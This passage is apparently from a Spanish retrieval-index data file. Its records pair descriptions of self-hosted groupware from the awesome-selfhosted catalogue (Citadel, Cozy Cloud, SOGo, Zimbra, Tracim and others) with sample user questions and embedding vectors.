-0.0483, -0.04928, 0.01444, -0.0031, -0.046, 0.02025, 0.00473]} +{"tipo": "pregunta", "herramienta": "Groupware", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Groupware", "tema": "groupware", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Groupware: Citadel β€” Groupware including email, calendar/scheduling, address books, forums, mailing lists, IM, wiki and blog engines, RSS aggregation and more [GPL-3.0, C/Docker/Shell]. Colanode β€” Collaboration suite with real-time messaging, rich text pages, file management, and dynamic databases - built for offline work (alternative to Slack, Notion) [Apache-2.0, K8S/Docker]. Cozy Cloud β€” Personal cloud where you can manage and sync your files, notes, contacts, passwords, and documents [GPL-3.0, Nodejs]. Digipad β€” An online self-hosted application for creating collaborative digital notepads (Documentation in french) [AGPL-3.0, Nodejs]. Digistorm β€” Create collaborative surveys, quizzes, brainstorms, and word clouds (documentation in French) [AGPL-3.0, Nodejs]. Digiwall β€” Create multimedia collaborative walls for in-person or remote work (documentation in French) [AGPL-3.0, Nodejs].", "indexar": "hay alguna alternativa libre a Slack o Notion que funcione fuera de lΓ­nea?", "v": [-0.1135, 0.10224, -0.25358, 0.0378, -0.05797, -0.19295, -0.11048, -0.08405, -0.10848, 0.0604, -0.10844, -0.22477, 0.09263, -0.00118, 0.13001, -0.00263, -0.06967, -0.11258, -0.0603, -0.02164, -0.19723, 0.0399, -0.10166, -0.05601, 0.00543, -0.08859, 0.06766, -0.04367, -0.09914, 0.03915, -0.03157, 0.07797, 0.13983, -0.05169, 0.06995, -0.05022, 0.07854, -0.00397, 0.18308, 0.01594, 0.04574, -0.02123, -0.07588, -0.02001, -0.07707, -0.02771, -0.10816, 0.02067, 0.0089, 0.1076, -0.04247, -0.07964, -0.04924, 0.07296, -0.04626, 0.01116, 0.12234, -0.04867, 0.04097, -0.00107, -0.09865, -0.0125, 0.11361, -0.11966, 0.1188, 0.08164, -0.00432, -0.10537, 0.01308, 0.08552, 0.01181, 0.04558, 0.00187, -0.02838, -0.0474, 0.05711, -0.00718, 0.01384, -0.03113, -0.00165, 0.03281, -0.00575, 0.04834, -0.02937, -0.07648, 0.01713, 0.04798, -0.07959, -0.03417, 0.04701, 0.02964, 0.05663, -0.06176, 0.08123, -0.04594, -0.08432, -0.04106, 0.03718, 0.10321, -0.01571, 0.08898, 0.01672, -0.10639, -0.00642, 0.00014, 0.01494, 0.08227, -0.00779, 0.01314, 0.08872, -0.01656, -0.01235, 0.00667, -0.06741, -0.04838, -0.03787, -0.0647, 0.01122, -0.01402, 0.03272, -0.03878, -0.0525, -0.0112, -0.0608, 0.01948, -0.02376, -0.01927, 0.03494, 0.00074, -0.00244, 0.00046, -0.01225, -0.04759, -0.10328, -0.08958, 0.03943, 0.0186, 0.03301, 0.06002, -0.10279, 0.03424, 0.00504, -0.03898, 0.03497, -0.02396, -0.02542, 0.02881, -0.10732, -0.06722, 0.00404, 0.01174, -0.00264, -0.02905, 0.13762, -0.00619, 0.06828, 0.02698, -0.01226, 0.0176, 0.11295, -0.01465, -0.04915, 0.02812, 0.03293, -0.05362, 0.01383, -0.03967, -0.01455, -0.08665, 0.0034, 0.0108, 0.06238, -0.00947, -0.11533, 0.02602, -0.097, -0.07446, 0.01087, 0.12898, -0.03222, -0.01462, 0.03156, -0.0322, -0.08229, -0.03677, -0.02691, -0.04632, -0.02117, 0.00361, 0.03723, 0.03418, 0.0151, -0.05833, -0.03446, -0.0372, -0.01736, 0.04398, -0.08891, 0.02278, -0.01254, -0.12041, -0.02585, -0.01031, -0.04622, 0.00794, 0.03487, -0.02144, 0.02253, 0.02269, 0.06138, 0.07798, -0.0845, 0.08314, -0.01377, -0.02765, -0.00294, 0.04154, -0.05513, 0.02351, 0.03159, 0.04316, 0.00591, 0.00883, 0.02968, 0.01773, 0.01389, -0.00609, 0.06788, -0.00072, 0.05555, 0.0386, -0.00119, 0.02792, -0.0465, 0.03519, -0.01477, 0.01601, 0.05223, -0.03557, -0.00774, 0.01454, 0.05391, -0.05178, -0.00451, 0.00379, -0.02685, -0.05526, -0.02795, 0.00948, -0.05186, 0.00262, 0.02286, 0.00142, 0.01922, 0.01808, 0.02428]} +{"tipo": "pregunta", "herramienta": "Groupware", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Groupware", "tema": "groupware", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Groupware: Citadel β€” Groupware including email, calendar/scheduling, address books, forums, mailing lists, IM, wiki and blog engines, RSS aggregation and more [GPL-3.0, C/Docker/Shell]. Colanode β€” Collaboration suite with real-time messaging, rich text pages, file management, and dynamic databases - built for offline work (alternative to Slack, Notion) [Apache-2.0, K8S/Docker]. Cozy Cloud β€” Personal cloud where you can manage and sync your files, notes, contacts, passwords, and documents [GPL-3.0, Nodejs]. Digipad β€” An online self-hosted application for creating collaborative digital notepads (Documentation in french) [AGPL-3.0, Nodejs]. Digistorm β€” Create collaborative surveys, quizzes, brainstorms, and word clouds (documentation in French) [AGPL-3.0, Nodejs]. Digiwall β€” Create multimedia collaborative walls for in-person or remote work (documentation in French) [AGPL-3.0, Nodejs].", "indexar": "cual es una herramienta para sincronizar archivos personales y gestionar contraseΓ±as", "v": [0.00875, -0.06888, -0.02929, -0.25569, 0.01995, -0.17553, -0.02679, -0.05076, -0.0814, -0.03629, -0.00363, -0.04486, 0.01124, -0.05124, 0.0643, 0.04069, 0.1416, -0.05607, 0.01953, 0.12806, -0.09665, 0.02946, -0.00142, -0.03216, -0.1075, -0.0876, 0.04498, -0.02468, -0.1802, 0.03217, -0.04895, -0.00474, 0.11355, -0.00776, -0.00371, 0.09322, -0.00775, 0.12729, -0.06267, 0.12986, -0.01557, 0.0813, -0.11539, 0.1605, 0.02875, 0.00728, 0.03792, 0.03286, 0.10263, 0.043, -0.11076, -0.13586, -0.06239, -0.04226, 0.0063, -0.14547, 0.13557, -0.10018, 0.06996, -0.00681, -0.12585, 0.10812, 0.00342, 0.09011, -0.12796, -0.03759, 0.0563, -0.03546, -0.16994, 0.16596, 0.06417, 0.05762, 0.00669, 0.06593, 0.0171, -0.00808, 0.10539, 0.07409, 0.00759, 0.08748, -0.00027, -0.02741, -0.02745, -0.01921, -0.1367, -0.02464, 0.06142, 0.0515, 0.06458, -0.02732, 0.03553, -0.03926, -0.06216, -0.07353, 0.00523, 0.01485, 0.04261, -0.04165, -0.11159, -0.07931, 0.02276, 0.01956, -0.07423, 0.12719, -0.03003, 0.06424, -0.03082, 0.04482, -0.02359, -0.07378, 0.03994, 0.06667, 0.02683, 0.06065, -0.00215, 0.07667, -0.02879, -0.12579, 0.05453, -0.05286, -0.02574, -0.03623, 0.00197, -0.0483, 0.0805, 0.05361, 0.05808, 0.04168, -0.05555, -0.06121, 0.01495, -0.03079, -0.05322, 0.02587, -0.03489, 0.00507, -0.0429, -0.11153, -0.08665, -0.09087, -0.0219, 0.02902, -0.01711, -0.01476, 0.09892, 0.02494, 0.0026, -0.01782, -0.01417, 0.00848, 0.00763, -0.0611, 0.02204, 0.00368, -0.05623, 0.05248, -0.09006, -0.03699, -0.11438, 0.06419, -0.02198, -0.05175, -0.01649, 0.0545, -0.0606, -0.05784, 0.07837, 0.09765, 0.03513, 0.01373, 0.06844, 0.01587, 0.02223, 0.00131, 0.02362, -0.06516, -0.03259, -0.07107, 0.03633, -0.07444, 0.02175, -0.04395, 0.01097, -0.00151, 0.03232, -0.05925, 0.05519, 0.05369, -0.05296, 0.02067, 0.00196, -0.01824, -0.03417, -0.00728, 0.0297, 0.02792, -0.01713, -0.03054, -0.04228, -0.01927, 0.03104, -0.00078, -0.03481, -0.00694, 0.03115, 0.05167, -0.06038, -0.0412, 0.00925, -0.01758, 0.02232, 0.03791, 0.00389, -0.04188, -0.04146, -0.05101, -0.04538, 0.03476, -0.00571, -0.04123, 0.03644, 0.00711, 0.07758, 0.0125, -0.04294, 0.0191, -0.01935, 0.03294, -0.01063, -0.04665, -0.02531, 0.02316, -0.01694, 0.06114, 0.08057, -0.0279, -0.00655, -0.05104, -0.01353, -0.03718, -0.03752, 0.06005, 0.04754, -0.03369, -0.07765, -0.02337, -0.02424, 0.00106, -0.01111, -0.01877, -0.00693, 0.02233, 0.00289, 0.04681, 0.02413, -0.01565]} +{"tipo": "pregunta", "herramienta": "Groupware", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Groupware", "tema": "groupware", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Groupware: egroupware β€” Software suite including calendars, address books, notepad, project management tools, client relationship management tools (CRM), knowledge management tools, a wiki and a CMS [GPL-2.0, PHP]. Group Office β€” Enterprise CRM and groupware tool. Share projects, calendars, files and e-mail online with co-workers and clients [AGPL-3.0, PHP]. Openmeetings β€” Video conferencing, instant messaging, whiteboard, collaborative document editing and other groupware tools using API functions of the Red5 Streaming Server for Remoting and Streaming [Apache-2.0, Java]. SOGo β€” SOGo offers multiple ways to access the calendaring and messaging data. CalDAV, CardDAV, GroupDAV, as well as ActiveSync, including native Outlook compatibility and Web interface [LGPL-2.1, Objective-C]. Tine β€” Software for digital collaboration in companies and organizations. From powerful groupware functionalities to clever add-ons, tine combines everything to make daily team collaboration easier [AGPL-3.0, Docker].", "indexar": "que programa sirve para montar un grupo de trabajo con calendarios y correos compartidos?", "v": [0.14327, 0.05054, -0.12731, -0.19798, -0.0756, -0.14456, 0.15283, 0.0108, -0.05869, -0.18274, -0.02998, 0.01111, 0.12075, -0.03703, 0.06727, 0.0049, 0.12276, 0.01267, 0.02976, 0.01107, -0.02144, 0.02644, -0.04624, -0.06576, -0.0624, -0.01933, 0.05535, -0.10337, -0.05474, 0.11752, 0.10881, -0.01569, 0.01753, -0.06529, 0.12295, -0.04554, 0.001, 0.03879, -0.08438, -0.06038, 0.0053, 0.02492, -0.20392, -0.01641, -0.03049, -0.00264, -0.01706, 0.03563, -0.06653, 0.01842, -0.00292, 0.00274, -0.04127, 0.01752, -0.10858, -0.07686, 0.10285, -0.04308, -0.03277, 0.00272, 0.03243, 0.10852, 0.02535, 0.03645, 0.04894, -0.03881, 0.06393, 0.0022, -0.13458, 0.0274, -0.0392, -0.03894, -0.02121, -0.07906, -0.01702, -0.02204, 0.01437, 0.05209, -0.08644, 0.03404, 0.08324, -0.01447, 0.08515, 0.08042, -0.02122, -0.08548, 0.06485, -0.00714, -0.07384, -0.07724, 0.01711, 0.07888, -0.02524, 0.06539, 0.04377, -0.00541, 0.03072, 0.04386, -0.02566, 0.06001, 0.05124, -0.00788, -0.06776, 0.12102, -0.05385, 0.16644, -0.00521, 0.08376, 0.07542, 0.07863, -0.00713, -0.03413, -0.06514, 0.00071, -0.08319, -0.10554, 0.01038, 0.02795, 0.05832, -0.10958, -0.03848, 0.11951, 0.01412, 0.08316, 0.07944, -0.08745, 0.09358, 0.11794, -0.01974, 0.10915, -0.13576, 0.01323, -0.05533, 0.03827, -0.12742, -0.0356, -0.04747, -0.04521, 0.01595, -0.03188, 0.03302, 0.06372, 0.03573, -0.06243, 0.01565, 0.09, 0.05059, -0.09234, -0.0332, -0.01288, -0.02558, 0.079, -0.01586, 0.01655, -0.10178, -0.04133, 0.02758, -0.07579, -0.00145, 0.00347, -0.00825, 0.0373, -0.0308, 0.03929, 0.03316, -0.04346, -0.02549, -0.00101, 0.06645, 0.11365, -0.02569, 0.01604, 0.11909, -0.07074, -0.00672, -0.00246, -0.0083, 0.02093, 0.0501, 0.06952, -0.09184, 0.08936, 0.04038, 0.0414, -0.0723, -0.01633, -0.01638, 0.07164, 0.02953, 0.01136, -0.02897, -0.04076, 0.00645, 0.01088, 0.0022, -0.07161, -0.04109, -0.06757, 0.00535, -0.05497, 0.01365, -0.04881, 0.00508, 0.05054, -0.00634, 0.0457, -0.05569, 0.06247, 0.05171, 0.15, 0.03613, -0.07863, 0.03771, 0.00305, -0.05259, -0.01642, 0.06666, 0.01378, 0.00877, 0.08111, -0.00427, 0.02612, 0.0399, -0.03385, -0.00107, -0.02496, 0.04346, 0.02114, 0.09688, 0.00352, 0.02155, 0.02104, 0.00428, -0.04177, 0.055, 0.0473, 0.04225, 0.00861, -0.00854, -0.04242, -0.00353, 0.01594, -0.02132, -0.00927, -0.06985, -0.03952, -0.05076, 0.01386, -0.04274, 0.00604, -0.04456, -0.00516, -0.01907, -0.04918, 0.04276, 0.00966]} +{"tipo": "pregunta", "herramienta": "Groupware", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Groupware", "tema": "groupware", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Groupware: egroupware β€” Software suite including calendars, address books, notepad, project management tools, client relationship management tools (CRM), knowledge management tools, a wiki and a CMS [GPL-2.0, PHP]. Group Office β€” Enterprise CRM and groupware tool. Share projects, calendars, files and e-mail online with co-workers and clients [AGPL-3.0, PHP]. Openmeetings β€” Video conferencing, instant messaging, whiteboard, collaborative document editing and other groupware tools using API functions of the Red5 Streaming Server for Remoting and Streaming [Apache-2.0, Java]. SOGo β€” SOGo offers multiple ways to access the calendaring and messaging data. CalDAV, CardDAV, GroupDAV, as well as ActiveSync, including native Outlook compatibility and Web interface [LGPL-2.1, Objective-C]. Tine β€” Software for digital collaboration in companies and organizations. From powerful groupware functionalities to clever add-ons, tine combines everything to make daily team collaboration easier [AGPL-3.0, Docker].", "indexar": "cual es una alternativa libre a los sistemas de gestiΓ³n empresarial que incluyan wikis y CRM?", "v": [-0.09023, -0.05955, 0.05599, -0.16162, 0.08337, -0.17081, -0.04482, -0.02836, -0.1445, -0.1521, -0.06168, -0.18981, -0.02849, -0.03938, 0.10259, 0.05173, 0.11464, -0.13761, 0.06164, -0.0452, -0.02669, -0.08922, -0.06558, 0.03777, -0.16362, -0.02105, -0.02788, -0.14575, 0.01263, 0.0323, 0.04518, 0.0648, 0.08578, -0.03281, -0.02717, 0.02992, -0.02388, 0.11423, 0.07647, -0.05897, 0.01795, -0.0953, -0.01592, 0.07401, 0.10547, -0.09528, 0.02355, -0.08335, 0.0567, -0.04475, -0.20784, -0.03207, -0.16701, -0.07491, 0.08222, -0.05656, 0.01123, -0.04907, -0.05167, 0.03615, -0.06819, 0.15051, -0.08761, 0.0197, -0.01947, -0.00701, -0.07732, -0.02749, -0.04026, 0.1624, -0.00063, -0.08191, -0.01621, -0.03005, 0.09645, 0.01125, 0.0789, 0.14793, -0.08836, 0.03353, 0.07508, -0.15356, -0.05579, 0.1047, -0.06124, -0.09506, 0.07652, 0.02712, -0.01155, 0.03411, 0.07941, -0.04918, -0.03927, -0.03595, -0.00557, -0.07163, 0.01998, 0.04456, -0.05374, 0.07013, -0.07727, -0.02168, -0.12234, -0.06856, -0.08618, 0.04475, -0.01298, -0.03108, -0.00383, 0.0524, 0.00211, 0.03634, 0.01857, 0.02709, -0.0313, -0.00223, 0.03587, -0.03035, -0.06587, 0.01523, 0.00601, -0.04967, -0.00335, -0.09226, 0.01026, 0.01045, 0.09037, 0.13907, 0.00181, -0.01866, 0.0452, -0.06093, -0.09245, 0.02497, -0.11389, -0.05027, 0.01123, 0.05449, 0.02276, 0.00174, -0.09425, 0.04139, 0.01897, -0.00419, 0.06925, -0.04236, 0.05688, -0.04525, -0.00089, 0.03337, -0.03827, 0.0201, -0.0588, 0.0551, -0.06216, 0.04122, 0.01146, -0.01276, -0.02727, 0.08626, 0.03441, -0.02634, -0.00374, 0.0293, 0.01065, -0.08596, -0.02764, -0.04325, -0.02156, 0.04307, -0.01506, 0.09419, 0.00689, -0.05153, 0.03169, -0.05428, 0.0363, -0.08472, 0.04261, -0.04812, -0.02462, -0.02216, -0.03643, 0.02566, 0.0019, -0.02941, -0.04356, 0.03811, -0.02066, 0.05014, -0.03013, 0.0409, -0.04433, -0.0821, 0.02148, 0.02094, -0.01688, -0.09024, -0.00812, -0.03311, -0.1014, -0.01886, -0.01283, -0.03746, -0.02957, 0.03739, 0.00161, 0.0734, 0.0349, 0.03224, 0.00931, 0.05733, 0.01033, -0.0093, -0.06541, -0.01992, -0.0128, -0.00581, 0.0201, -0.0487, 0.05854, -0.01045, 0.04333, 0.01709, 0.0118, 0.04209, 0.0303, 0.03043, -0.05155, -0.01175, -0.00374, -0.01835, 0.02662, 0.02601, -0.00318, -0.00759, 0.02879, -0.03508, 0.02053, -0.03429, 0.05463, 0.05031, -0.02091, -0.01285, -0.04874, -0.01457, -0.07544, -0.02625, -0.06039, -0.05189, -0.0329, -0.02749, -0.03093, 0.00682, -0.00721, -0.0246]} +{"tipo": "pregunta", "herramienta": "Groupware", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Groupware", "tema": "groupware", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Groupware: egroupware β€” Software suite including calendars, address books, notepad, project management tools, client relationship management tools (CRM), knowledge management tools, a wiki and a CMS [GPL-2.0, PHP]. Group Office β€” Enterprise CRM and groupware tool. Share projects, calendars, files and e-mail online with co-workers and clients [AGPL-3.0, PHP]. Openmeetings β€” Video conferencing, instant messaging, whiteboard, collaborative document editing and other groupware tools using API functions of the Red5 Streaming Server for Remoting and Streaming [Apache-2.0, Java]. SOGo β€” SOGo offers multiple ways to access the calendaring and messaging data. CalDAV, CardDAV, GroupDAV, as well as ActiveSync, including native Outlook compatibility and Web interface [LGPL-2.1, Objective-C]. Tine β€” Software for digital collaboration in companies and organizations. From powerful groupware functionalities to clever add-ons, tine combines everything to make daily team collaboration easier [AGPL-3.0, Docker].", "indexar": "con que puedo crear videollamadas en tiempo real junto con la ediciΓ³n colaborativa de documentos?", "v": [0.15757, 0.07186, -0.18998, 0.02795, 0.04287, -0.07416, 0.0788, 0.02432, 0.03291, -0.14539, 0.01152, -0.21503, 0.11468, -0.14069, 0.03801, 0.07372, 0.19092, -0.10423, -0.0002, -0.11263, 0.08494, -0.04676, -0.06092, -0.00769, 0.07617, -0.10385, 0.06287, -0.03108, 0.01427, -0.05066, 0.0536, 0.09709, 0.00185, -0.00516, -0.05355, 0.00378, -0.002, 0.01822, -0.13225, 0.02631, -0.07958, 0.12255, -0.09771, 0.0081, -0.0383, 0.00328, 0.00853, 0.01994, -0.17293, 0.04476, -0.05697, -0.01172, -0.1159, 0.01662, -0.06397, -0.18874, 0.21246, -0.20787, -0.04938, -0.06564, -0.046, 0.01955, -0.05823, 0.01807, -0.01818, 0.03554, 0.03971, -0.04729, -0.00164, 0.06956, -0.1636, 0.01391, 0.02213, -0.09492, -0.01561, -0.02113, -0.10544, -0.01215, -0.09656, 0.00887, 0.04432, -0.03242, 0.05866, 0.0116, -0.06306, -0.04466, -0.00382, -0.07822, 0.03186, -0.05923, 0.0023, 0.07075, 0.07763, -0.03763, 0.03535, -0.03008, 0.06833, -0.0521, -0.03786, 0.05724, 0.0155, -0.03963, -0.07617, 0.00348, -0.00726, 0.09843, -0.01276, 0.01948, -0.02128, 0.02693, 0.03314, 0.09062, -0.0145, 0.01813, 0.01399, -0.00677, 0.00062, -0.02793, -0.0193, -0.06322, 0.1216, -0.06336, -0.06904, -0.03298, 0.00856, 0.01887, -0.06659, 0.02962, -0.02063, -0.03198, -0.00116, 0.02122, -0.07143, 0.00427, 0.03192, -0.03061, -0.02032, 0.03602, -0.02947, -0.08844, 0.06089, -0.02739, 0.02242, -0.04177, 0.00861, -0.02749, -0.06137, -0.02185, -0.07011, 0.01085, 0.08912, -0.03343, -0.00937, -0.00968, -0.02656, 0.06045, 0.03573, -0.01987, -0.06141, -0.0108, 0.03243, 0.09502, -0.08569, -0.02629, -0.07748, -0.04085, -0.01469, 0.03569, 0.00169, -0.01904, 0.03291, -0.03668, 0.033, -0.083, 0.01082, -0.01169, -0.01829, -0.03898, 0.02083, -0.11984, -0.05144, 0.00123, -0.00692, 0.01039, 0.02184, -0.0623, 0.06159, -0.0284, 0.01706, -0.01261, 0.0197, -0.0009, 0.04682, 0.05157, -0.025, -0.11459, 0.01472, -0.06759, 0.01261, -0.03871, -0.02345, -0.0391, -0.00607, -0.01856, -0.00618, 0.05283, -0.09468, 0.10863, 0.02492, 0.00436, 0.00983, -0.03416, 0.02877, -0.04683, -0.03867, 0.00114, 0.04557, -0.00895, -0.04808, 0.00179, 0.07313, -0.02964, 0.0776, -0.04845, 0.03951, 0.00931, 0.09677, 0.07556, -0.01178, -0.0401, -0.04751, -0.01794, -0.02749, -0.07367, 0.03058, 0.05751, 0.03187, -0.03286, -0.10096, -0.03533, 0.02184, 0.03686, -0.05655, -0.02235, -0.02342, -0.04372, -0.06838, -0.01997, 0.03478, -0.09352, -0.01396, 0.04843, 0.04594, -0.0148, -0.00672, -0.03622]} +{"tipo": "pregunta", "herramienta": "Groupware", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Groupware", "tema": "groupware", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Groupware: Tracim β€” Collaborative Platform for team collaboration: file,threads,notes,agenda,etc [AGPL-3.0/LGPL-3.0/MIT, Python]. Zimbra Collaboration β€” Email, calendar, collaboration server with Web interface and lots of integrations [GPL-2.0/CPAL-1.0, Java].", "indexar": "quΓ© herramienta es Tracim para la colaboraciΓ³n de equipos?", "v": [-0.0635, 0.04612, -0.13301, -0.18524, 0.12221, -0.19209, -0.02975, 0.15913, 0.07174, 0.03275, -0.10995, 0.03796, 0.03881, -0.00031, 0.12674, 0.09271, 0.08134, -0.16508, 0.01237, -0.03599, 0.00428, 0.00164, -0.14028, -0.03552, -0.00587, -0.04767, -0.00869, -0.05643, -0.20362, 0.05599, 0.02492, 0.0561, 0.10814, 0.00366, -0.00668, -0.12402, 0.01371, -0.02304, 0.00613, 0.04177, -0.13935, -0.1469, -0.04702, -0.01137, 0.05053, -0.02411, -0.06921, 0.03519, 0.0563, -0.00464, -0.20502, -0.02439, -0.04317, -0.1666, -0.05952, -0.13652, 0.11899, -0.09412, -0.07893, -0.11803, -0.02192, -0.00787, -0.05695, -0.0452, 0.00722, -0.00084, -0.09051, -0.05567, -0.062, 0.06218, 0.02266, -0.00816, 0.03604, -0.08201, -0.06552, 0.04379, 0.02863, 0.1029, 0.05495, -0.08265, 0.12054, 0.03564, 0.0287, 0.01533, 0.00878, 0.00126, 0.14908, 0.08705, 0.0558, -0.03402, -0.06181, 0.04507, -0.03328, -0.0974, 0.05137, -0.03357, 0.11338, -0.02892, -0.02772, 0.01621, 0.07227, -0.02901, -0.07463, 0.02274, -0.08663, 0.01477, -0.02396, 0.05422, -0.1009, 0.0183, 0.07914, 0.02251, 0.00138, 0.05821, -0.02582, -0.03651, -0.02607, -0.03169, 0.01593, -0.04043, 0.06234, 0.02736, -0.03268, -0.03874, 0.05985, -0.03278, 0.0126, 0.02258, -0.01616, -0.09063, -0.07356, -0.02638, -0.08416, 0.04844, -0.02245, -0.01783, 0.03869, -0.10548, -0.06778, -0.04778, 0.03901, -0.02464, -0.03005, -0.11086, 0.01004, -0.04656, -0.03712, 0.02178, -0.02015, 0.02325, 0.06356, -0.03343, -0.01495, -0.01756, -0.0398, 0.04086, 0.0038, 0.07877, -0.13463, 0.04001, -0.09581, -0.11425, 0.05299, -0.00146, -0.00783, -0.04539, 0.0396, -0.01111, 0.0355, 0.04442, 0.01565, -0.05004, 0.07199, -0.03116, -0.05925, -0.02125, -0.01782, -0.02496, -0.00337, -0.087, -0.06407, 0.01296, -0.0461, -0.00304, 0.07931, -0.01975, -0.00457, -0.02281, 0.00253, 0.01783, -0.03485, 0.0132, 0.05681, -0.09921, 0.06639, 0.02632, 0.00801, -0.04369, 0.06063, -0.0139, -0.03005, 0.00096, -0.00317, -0.01301, -0.01914, 0.05502, -0.07, -0.02648, 0.03239, 0.04398, 0.09125, 0.00383, -0.00852, -0.03596, -0.01781, -0.00355, -0.0641, 0.05297, -0.021, 0.00925, 0.01399, 0.0052, 0.05637, -0.03654, -0.01211, 0.04792, 0.02101, 0.08101, 0.02553, -0.03668, 0.00607, -0.07568, -0.02459, -0.00489, 0.00731, -0.00386, 0.08739, -0.01552, -0.06253, -0.0202, -0.0321, 0.02562, -0.00874, -0.00229, -0.02074, -0.02047, 0.00466, -0.04124, -0.01184, -0.0565, -0.02483, 0.03598, 0.05694, -0.06307, 0.02559, -0.01985]} +{"tipo": "pregunta", "herramienta": "Groupware", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Groupware", "tema": "groupware", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Groupware: Tracim β€” Collaborative Platform for team collaboration: file,threads,notes,agenda,etc [AGPL-3.0/LGPL-3.0/MIT, Python]. Zimbra Collaboration β€” Email, calendar, collaboration server with Web interface and lots of integrations [GPL-2.0/CPAL-1.0, Java].", "indexar": "cΓ³mo puedo montar un servidor de correo y calendario como Zimbra?", "v": [-0.16591, 0.01225, -0.13535, -0.11242, -0.15379, -0.09386, 0.05028, -0.01775, -0.11558, -0.16814, -0.04597, -0.01368, 0.15344, -0.04304, 0.06767, 0.10742, 0.18552, -0.01715, 0.03807, 0.00041, 0.03175, 0.00199, 0.04754, -0.05806, -0.12526, 0.02543, 0.09077, -0.12997, -0.14928, -0.0623, 0.02115, -0.06536, 0.06493, 0.06111, 0.0899, -0.02564, 0.06999, 0.06661, -0.17619, -0.07813, -0.0248, 0.04036, -0.02836, 0.01068, -0.04464, 0.06952, 0.10634, -0.03444, 0.05594, -0.08236, -0.01517, -0.03766, -0.04133, -0.00948, -0.02435, 0.00684, 0.08143, -0.10579, 0.14652, -0.02924, 0.09154, 0.09965, -0.01061, 0.05831, 0.03399, -0.06194, -0.09354, -0.0197, -0.06492, -0.00129, -0.06304, -0.09205, 0.00277, -0.11284, 0.01743, 0.01836, 0.03067, 0.00011, -0.00482, 0.09245, 0.0193, 0.04022, -0.01573, 0.17312, -0.10708, 0.00687, 0.03463, -0.01443, 0.08699, -0.02368, 0.01836, 0.14949, -0.05634, 0.12068, -0.02898, -0.04981, 0.04883, -0.00268, -0.03877, 0.00819, -0.00099, 0.08445, -0.06048, 0.12018, 0.00125, 0.09586, 0.06012, -0.00092, 0.14192, -0.01018, -0.00113, -0.06442, -0.15464, 0.03443, -0.09021, -0.10119, 0.07517, 0.04672, 0.073, 0.00195, -0.0344, 0.01648, 0.0315, 0.02832, 0.03268, -0.04268, 0.13771, 0.03289, -0.02691, 0.00101, -0.06524, -0.0301, -0.05925, 0.03627, -0.02433, 0.0278, -0.0162, -0.04976, -0.0442, -0.03761, 0.00053, -0.00975, 0.00782, -0.03705, 0.07397, 0.01601, 0.02386, -0.15822, -0.04405, -0.01944, 0.02906, 0.04032, -0.01088, 0.03225, -0.07063, -0.09392, -0.01031, -0.03404, 0.03617, 0.04478, 0.04477, 0.04658, 0.00315, 0.0784, 0.07354, 0.01025, -0.00182, 0.02066, 0.00866, 0.03938, 0.01354, 0.07678, 0.04627, -0.04057, 0.03861, -0.02814, -0.01797, 0.02192, -0.02284, 0.02413, -0.04083, 0.0922, -0.00556, 0.02571, -0.06004, -0.06028, 0.03263, 0.02263, 0.05519, 0.0328, 0.02472, 0.02174, -0.01014, 0.04223, 0.0308, -0.08882, -0.03556, -0.01377, -0.0715, -0.08311, 0.01234, -0.06226, 0.02789, -0.01648, 0.01665, -0.01943, -0.06972, 0.0789, 0.01078, 0.09133, 0.01553, -0.04763, 0.10035, -0.0461, -0.02089, -0.01749, 0.03968, -0.04369, -0.02539, -0.04313, 0.01181, 0.04278, 0.01769, -0.00127, -0.01917, 0.02682, 0.03576, -0.01039, 0.08979, -0.00705, -0.05887, 0.04549, -0.00958, -0.01779, 0.00348, 0.02118, 0.03093, -0.00379, -0.01992, -0.01255, 0.03776, 0.06492, 0.0316, -0.00325, -0.04178, -0.06327, -0.0379, 0.01108, -0.01961, -0.01746, -0.00247, -0.06023, 0.02163, -0.02047, 0.00756, -0.02794]} +{"tipo": "pregunta", "herramienta": "Groupware", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Groupware", "tema": "groupware", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Groupware: Tracim β€” Collaborative Platform for team collaboration: file,threads,notes,agenda,etc [AGPL-3.0/LGPL-3.0/MIT, Python]. Zimbra Collaboration β€” Email, calendar, collaboration server with Web interface and lots of integrations [GPL-2.0/CPAL-1.0, Java].", "indexar": "cuΓ‘l es una alternativa libre a las soluciones de grupo como Zimbra?", "v": [-0.09032, -0.00206, -0.08742, 0.1068, -0.00942, -0.10552, -0.0483, -0.1355, -0.1516, -0.11243, -0.02193, -0.14368, -0.0341, 0.09252, 0.16981, -0.0465, 0.03107, -0.00534, 0.02262, -0.03805, -0.06083, -0.03898, -0.01446, -0.09035, -0.08127, -0.10945, 0.05095, -0.08232, -0.06637, 0.03682, 0.01182, -0.08683, 0.01642, -0.03166, 0.04345, 0.01427, 0.18083, 0.03437, 0.04934, -0.04002, -0.12003, -0.09166, -0.02505, 0.01113, -0.02567, 0.04658, -0.07134, 0.02796, 0.06881, 0.015, -0.03772, 0.11072, -0.0253, 0.02616, 0.06153, -0.0791, 0.04236, -0.0582, 0.04186, -0.01317, -0.01818, 0.08007, 0.05221, 0.01961, 0.08756, -0.03892, -0.14188, 0.01613, -0.0251, 0.07708, 0.03945, -0.10375, 0.02829, -0.13649, -0.06511, 0.10254, -0.10239, -0.00512, -0.03973, 0.08549, 0.21856, -0.01849, -0.02443, -0.04307, 